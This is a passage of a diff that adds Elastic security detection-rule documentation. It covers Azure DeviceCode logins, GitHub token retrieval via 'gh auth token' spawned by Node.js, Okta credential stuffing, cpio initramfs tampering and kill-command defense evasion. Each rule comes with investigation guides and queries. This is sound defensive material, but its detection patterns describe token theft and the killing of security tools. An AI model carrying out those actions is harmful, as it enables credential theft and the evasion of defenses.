**Monitor for Anomalous Account Activity**: Look for recent changes in the user's account settings, including password resets, role changes, or delegation of access. +- **Check for Additional DeviceCode Logins**: Review if other users in the environment have triggered similar authentication events within the same timeframe. + + +*False Positive Analysis* + + +- **Legitimate Device Enrollment**: If the user is setting up a new device (e.g., a smart TV or kiosk), this authentication may be expected. +- **Automation or Scripting**: Some legitimate applications or scripts may leverage the `DeviceCode` authentication protocol for non-interactive logins. +- **Shared Devices in Organizations**: In cases where shared workstations or conference room devices are in use, legitimate users may trigger alerts. +- **Travel and Remote Work**: If the user is traveling or accessing from a new location, confirm legitimacy before taking action. + + +*Response and Remediation* + + +- **Revoke Suspicious Access Tokens**: Immediately revoke any access tokens associated with this authentication event. +- **Investigate the User’s Recent Activity**: Review additional authentication logs, application access, and recent permission changes for signs of compromise. +- **Reset Credentials and Enforce Stronger Authentication**: + - Reset the affected user’s credentials. + - Enforce stricter MFA policies for sensitive accounts. 
+ - Restrict `DeviceCode` authentication to only required applications. +- **Monitor for Further Anomalies**: + - Enable additional logging and anomaly detection for DeviceCode logins. + - Set up alerts for unauthorized access attempts using this authentication method. +- **Educate Users on Phishing Risks**: If phishing is suspected, notify the affected user and provide security awareness training on how to recognize and report phishing attempts. +- **Review and Adjust Conditional Access Policies**: + - Limit `DeviceCode` authentication to approved users and applications. + - Implement stricter geolocation-based authentication restrictions. + + +==== Setup + + +This rule optionally requires Azure Sign-In logs from the Azure integration. Ensure that the Azure integration is correctly set up and that the required data is being collected. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:(azure.activitylogs or azure.signinlogs) + and ( + azure.signinlogs.properties.authentication_protocol:deviceCode or + azure.signinlogs.properties.original_transfer_method: "Device code flow" or + azure.activitylogs.properties.authentication_protocol:deviceCode + ) + and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-github-authentication-token-access-via-node-js.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-github-authentication-token-access-via-node-js.asciidoc new file mode 100644 index 0000000000..e7b19a1afe --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-github-authentication-token-access-via-node-js.asciidoc @@ -0,0 +1,113 @@ +[[prebuilt-rule-8-19-8-github-authentication-token-access-via-node-js]] +=== GitHub Authentication Token Access via Node.js + +This rule detects when the Node.js runtime spawns a shell to execute the GitHub CLI (gh) command to retrieve a GitHub authentication token. The GitHub CLI is a command-line tool that allows users to interact with GitHub from the terminal. The "gh auth token" command is used to retrieve an authentication token for GitHub, which can be used to authenticate API requests and perform actions on behalf of the user. Adversaries may use this technique to access GitHub repositories and potentially exfiltrate sensitive information or perform malicious actions. This activity was observed in the wild as part of the Shai-Hulud worm. 
+ +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Discovery +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. 
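+
+To add context around an alert from this rule during triage, a broader hunt for GitHub CLI activity launched from Node.js can be useful. The ES|QL sketch below is illustrative only and is not part of the rule: it lists processes spawned by Node.js whose command line invokes `gh`, which can surface follow-on actions such as repository enumeration or token exfiltration. Adjust the index pattern and wildcard to match your environment.
+
+[source, js]
+----------------------------------
+from logs-endpoint.events.process*
+| where host.os.type == "linux"
+    and event.type == "start"
+    and event.action == "exec"
+    and process.parent.name == "node"
+    and process.command_line like "*gh *"
+| keep @timestamp, host.name, user.name, process.name, process.command_line, process.parent.executable
+| sort @timestamp desc
+----------------------------------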
+ + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.parent.name == "node" and +process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and process.args == "gh auth token" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Container and Resource Discovery +** ID: T1613 +** Reference URL: https://attack.mitre.org/techniques/T1613/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-high-number-of-okta-device-token-cookies-generated-for-authentication.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-high-number-of-okta-device-token-cookies-generated-for-authentication.asciidoc new file mode 100644 index 0000000000..69ea4bc431 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-high-number-of-okta-device-token-cookies-generated-for-authentication.asciidoc @@ -0,0 +1,164 @@ +[[prebuilt-rule-8-19-8-high-number-of-okta-device-token-cookies-generated-for-authentication]] +=== High Number of Okta Device Token Cookies Generated for Authentication + +Detects when an Okta client address has a certain threshold of Okta user authentication events with multiple device token hashes generated for single user authentication. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://support.okta.com/help/s/article/How-does-the-Device-Token-work?language=en_US +* https://developer.okta.com/docs/reference/api/event-types/ +* https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy +* https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection +* https://www.okta.com/resources/whitepaper-how-adaptive-mfa-can-help-in-mitigating-brute-force-attacks/ +* https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security +* https://www.elastic.co/security-labs/starter-guide-to-understanding-okta + +*Tags*: + +* Use Case: Identity and Access Audit +* Data Source: Okta +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 207 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating High Number of Okta Device Token Cookies Generated for Authentication* + + +This rule detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. 
Adversaries may attempt to launch a credential stuffing attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. Note that Okta does not log unrecognized usernames supplied during authentication attempts, so this rule may not detect all credential stuffing attempts or may indicate a targeted attack. + + +*Possible investigation steps:* + +- Since this is an ESQL rule, the `okta.actor.alternate_id` and `okta.client.ip` values can be used to pivot into the raw authentication events related to this activity. +- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields. +- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields. +- Review the `okta.security_context.is_proxy` field to determine if the device is a proxy. + - If the device is a proxy, this may indicate that a user is using a proxy to access multiple accounts for password spraying. +- With the list of `okta.actor.alternate_id` values, review `event.outcome` results to determine if the authentication was successful. + - If the authentication was successful for any user, pivoting to `event.action` values for those users may provide additional context. +- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field. + - Historical analysis should indicate if this device token hash is commonly associated with the user. +- Review the `okta.event_type` field to determine the type of authentication event that occurred. + - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons. + - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying. + - If the event type is `user.session.start`, the source may have attempted to establish a session via the Okta authentication API. +- Examine the `okta.outcome.result` field to determine if the authentication was successful. +- Review the past activities of the actor(s) involved in this action by checking their previous actions. +- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity. + - This may help determine the authentication and authorization actions that occurred between the user, Okta and application. + + +*False positive analysis:* + +- A user may have legitimately started a session via a proxy for security or privacy reasons. +- Users may share an endpoint related to work or personal use in which separate Okta accounts are used. + - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons. + - Shared systems such as Kiosks and conference room computers may be used by multiple users. + - Shared working spaces may have a single endpoint that is used by multiple users. + + +*Response and remediation:* + +- Review the profile of the users involved in this action to determine if proxy usage may be expected. +- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required. 
+- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involved and enabling multi-factor authentication (MFA). + - If MFA is already enabled, consider resetting MFA for the users. +- If any of the users are not legitimate, consider deactivating the user's account. +- Conduct a review of Okta policies and ensure they are in accordance with security best practices. +- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user. + - If so, confirm with the user this was a legitimate request. + - If so and this was not a legitimate request, consider deactivating the user's account temporarily. + - Reset passwords and reset MFA for the user. +- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule. + - This will prevent future occurrences of this event for this device from triggering the rule. + - Alternatively, adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule. + - This should be done with caution as it may prevent legitimate alerts from being generated. + + +==== Setup + + +The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +from logs-okta* +| where + event.dataset == "okta.system" and + (event.action like "user.authentication.*" or event.action == "user.session.start") and + okta.debug_context.debug_data.request_uri == "/api/v1/authn" and + okta.outcome.reason == "INVALID_CREDENTIALS" +| keep + event.action, + okta.debug_context.debug_data.dt_hash, + okta.client.ip, + okta.actor.alternate_id, + okta.debug_context.debug_data.request_uri, + okta.outcome.reason +| stats + Esql.okta_debug_context_debug_data_dt_hash_count_distinct = count_distinct(okta.debug_context.debug_data.dt_hash) + by + okta.client.ip, + okta.actor.alternate_id +| where + Esql.okta_debug_context_debug_data_dt_hash_count_distinct >= 30 +| sort + Esql.okta_debug_context_debug_data_dt_hash_count_distinct desc + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Credential Stuffing +** ID: T1110.004 +** Reference URL: https://attack.mitre.org/techniques/T1110/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-initramfs-extraction-via-cpio.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-initramfs-extraction-via-cpio.asciidoc new file mode 100644 index 0000000000..a961c11853 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-initramfs-extraction-via-cpio.asciidoc @@ -0,0 +1,173 @@ +[[prebuilt-rule-8-19-8-initramfs-extraction-via-cpio]] +=== Initramfs Extraction via CPIO + +This rule detects the extraction of an initramfs image using the "cpio" command on Linux
systems. The "cpio" command is used to create or extract cpio archives. Attackers may extract the initramfs image to modify the contents or add malicious files, which can be leveraged to maintain persistence on the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* +* endgame-* +* auditbeat-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: Auditd Manager +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Initramfs Extraction via CPIO* + + +Initramfs is a temporary filesystem used during the Linux boot process, containing essential drivers and scripts. Attackers may exploit the `cpio` command to extract and modify initramfs, embedding malicious files to ensure persistence. The detection rule identifies suspicious `cpio` usage by monitoring process execution patterns, excluding legitimate parent processes, to flag potential threats. + + +*Possible investigation steps* + + +- Review the process execution details to confirm the presence of the cpio command with arguments "-H" or "--format" and "newc" to ensure the alert is not a false positive. +- Investigate the parent process of the cpio command to determine if it is an unexpected or unauthorized process, as legitimate processes like mkinitramfs or dracut should be excluded. +- Check the execution path of the parent process to verify if it matches any known legitimate paths such as "/usr/share/initramfs-tools/*" or "/nix/store/*". +- Analyze the timeline of events around the cpio execution to identify any preceding or subsequent suspicious activities that might indicate a broader attack or persistence mechanism. +- Examine the system for any unauthorized modifications or additions to the initramfs image that could indicate tampering or the presence of malicious files. +- Correlate the alert with other security data sources like Elastic Endgame, Elastic Defend, or Crowdstrike to gather additional context and assess the scope of the potential threat. + + +*False positive analysis* + + +- Legitimate system updates or maintenance activities may trigger the rule when tools like mkinitramfs or dracut are used. To handle this, ensure these processes are excluded by verifying that the parent process is mkinitramfs or dracut. +- Custom scripts or automation tools that manage initramfs might use cpio in a non-malicious context. Review these scripts and add their parent process names or paths to the exclusion list if they are verified as safe. 
+- Systems using non-standard initramfs management tools located in directories like /usr/share/initramfs-tools or /nix/store may cause false positives. Confirm these tools' legitimacy and update the exclusion paths accordingly. +- Development or testing environments where initramfs is frequently modified for legitimate reasons can generate alerts. Consider creating environment-specific exceptions to reduce noise while maintaining security in production systems. + + +*Response and remediation* + + +- Isolate the affected system from the network to prevent further unauthorized access or spread of potential malware. +- Terminate any suspicious processes related to the `cpio` command that do not have legitimate parent processes, such as `mkinitramfs` or `dracut`. +- Conduct a thorough review of the extracted initramfs contents to identify and remove any unauthorized or malicious files. +- Restore the initramfs from a known good backup to ensure system integrity and remove any potential persistence mechanisms. +- Monitor the system for any further suspicious activity, particularly related to the `cpio` command, to ensure the threat has been fully mitigated. +- Escalate the incident to the security operations team for further analysis and to determine if additional systems may be affected. +- Update security policies and procedures to include specific checks for unauthorized `cpio` usage and enhance detection capabilities for similar threats. + +==== Setup + + + +*Setup* + +This rule requires data coming in from Elastic Defend. + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. 
+For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed") and +process.name == "cpio" and process.args in ("-H", "--format") and process.args == "newc" and +not ( + process.parent.name in ("mkinitramfs", "dracut") or + ?process.parent.executable like~ ("/usr/share/initramfs-tools/*", "/nix/store/*") or + ?process.parent.args in ( + "/bin/dracut", "/usr/share/initramfs-tools/hooks/amd64_microcode", "/usr/bin/dracut", "/usr/sbin/mkinitramfs", + "/usr/sbin/dracut", "/usr/bin/update-microcode-initrd" + ) or + process.args like ("/var/tmp/mkinitramfs_*", "/tmp/tmp.*/mkinitramfs_*") or + ?process.working_directory like ( + "/var/tmp/mkinitramfs-*", "/tmp/microcode-initrd_*", "/var/tmp/mkinitramfs-*", "/var/tmp/dracut.*", + "/var/tmp/mkinitramfs_*" + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Pre-OS Boot +** ID: T1542 +** Reference URL: https://attack.mitre.org/techniques/T1542/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-kill-command-execution.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-kill-command-execution.asciidoc new file mode 100644 index 0000000000..6cc598684a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-kill-command-execution.asciidoc @@ -0,0 +1,171 @@ +[[prebuilt-rule-8-19-8-kill-command-execution]] +=== Kill Command Execution + +This rule detects the execution of kill, pkill, and killall commands on Linux systems. These commands are used to terminate processes on a system. Attackers may use these commands to kill security tools or other processes to evade detection or disrupt system operations. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Kill Command Execution* + +In Linux environments, commands like kill, pkill, and killall are essential for managing processes, allowing users to terminate them as needed. 
However, adversaries can exploit these commands to disable security tools or disrupt operations, aiding in evasion tactics. The detection rule identifies such misuse by monitoring process execution events, specifically targeting these commands to flag potential threats. + + +*Possible investigation steps* + + +- Review the process execution event details to identify the user account associated with the kill, pkill, or killall command execution. This can help determine if the action was performed by a legitimate user or a potential adversary. +- Examine the parent process of the command execution to understand the context in which the kill command was initiated. This can provide insights into whether the command was part of a script or an interactive session. +- Check the target process IDs (PIDs) that were terminated by the kill command to assess if critical or security-related processes were affected, which might indicate malicious intent. +- Investigate the timing and frequency of the command execution to identify patterns or anomalies, such as repeated or scheduled executions, which could suggest automated or scripted activity. +- Correlate the event with other security alerts or logs from the same host around the same timeframe to identify any related suspicious activities or indicators of compromise. + + +*False positive analysis* + + +- Routine system maintenance tasks may trigger the rule when administrators use kill commands to manage processes. To handle this, create exceptions for known maintenance scripts or processes by identifying their unique attributes, such as user or command line arguments. +- Automated scripts or monitoring tools that use kill commands for legitimate purposes, like restarting services, can cause false positives. Exclude these by specifying the script names or paths in the detection rule. +- Development environments where developers frequently use kill commands during testing can lead to alerts. Consider excluding processes executed by specific user accounts associated with development activities. +- System updates or package management tools might use kill commands as part of their operation. Identify these processes and exclude them based on their parent process or command line patterns. +- Backup or recovery operations that involve stopping services may trigger the rule. Exclude these by recognizing the specific backup software or service names involved. + + +*Response and remediation* + + +- Immediately isolate the affected Linux system from the network to prevent further malicious activity or lateral movement by the attacker. +- Identify and terminate any unauthorized or suspicious processes that were started around the time of the alert, focusing on those that may have been targeted by the kill, pkill, or killall commands. +- Review system logs and process execution history to determine the origin of the kill command execution and assess whether it was initiated by a legitimate user or a compromised account. +- Restore any terminated security tools or critical processes to ensure the system's defenses are fully operational. +- Conduct a thorough scan of the affected system using updated antivirus or endpoint detection tools to identify and remove any additional malware or persistence mechanisms. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if other systems may be affected. 
+- Implement additional monitoring and alerting for similar command executions across the network to enhance detection and response capabilities for future incidents. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. 
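+
+
+*Example triage query*
+
+
+The possible investigation steps above pivot on the executing user, the parent process, and the command line behind a kill, pkill, or killall execution. The following ESQL search is a minimal sketch of such a pivot against the same logs-endpoint.events.process* data the rule reads; it only uses fields referenced in this guide, and the aggregation is illustrative rather than part of the rule logic.
+
+[source, js]
+----------------------------------
+from logs-endpoint.events.process*
+| where host.os.type == "linux"
+    and event.type == "start"
+    and event.action == "exec"
+    and process.name in ("kill", "pkill", "killall")
+// count executions per host, user, and parent process to surface unusual sources
+| stats Esql.event_count = count(*)
+    by host.name, user.name, process.parent.name, process.command_line
+| sort Esql.event_count desc
+----------------------------------
+
+Narrowing the search to the host and timeframe of the alert, and comparing the parent processes against known maintenance scripts or automation, helps separate routine administration from attempts to disable security tooling.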
+ + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:start and event.action:exec and +process.name:(kill or pkill or killall) and not ( + process.args:("-HUP" or "-SIGUSR1" or "-USR2" or "-WINCH" or "-USR1") or + process.parent.command_line:"runc init" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Sub-technique: +** Name: Hidden Files and Directories +** ID: T1564.001 +** Reference URL: https://attack.mitre.org/techniques/T1564/001/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Indicator Blocking +** ID: T1562.006 +** Reference URL: https://attack.mitre.org/techniques/T1562/006/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-m365-onedrive-excessive-file-downloads-with-oauth-token.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-m365-onedrive-excessive-file-downloads-with-oauth-token.asciidoc new file mode 100644 index 0000000000..7f70f207e8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-m365-onedrive-excessive-file-downloads-with-oauth-token.asciidoc @@ -0,0 +1,142 @@ +[[prebuilt-rule-8-19-8-m365-onedrive-excessive-file-downloads-with-oauth-token]] +=== M365 OneDrive Excessive File Downloads with OAuth Token + +Identifies when an excessive number of files are downloaded from OneDrive using OAuth authentication. Adversaries may conduct phishing campaigns to steal OAuth tokens and impersonate users. These access tokens can then be used to download files from OneDrive. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 8m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/ + +*Tags*: + +* Domain: Cloud +* Domain: SaaS +* Data Source: Microsoft 365 +* Data Source: SharePoint +* Data Source: OneDrive +* Use Case: Threat Detection +* Tactic: Collection +* Tactic: Exfiltration +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating M365 OneDrive Excessive File Downloads with OAuth Token* + + +This rule detects an excessive number of files downloaded from OneDrive using OAuth authentication. Threat actors may use OAuth phishing attacks, such as **Device Code Authentication phishing**, to obtain valid access tokens and perform unauthorized data exfiltration. 
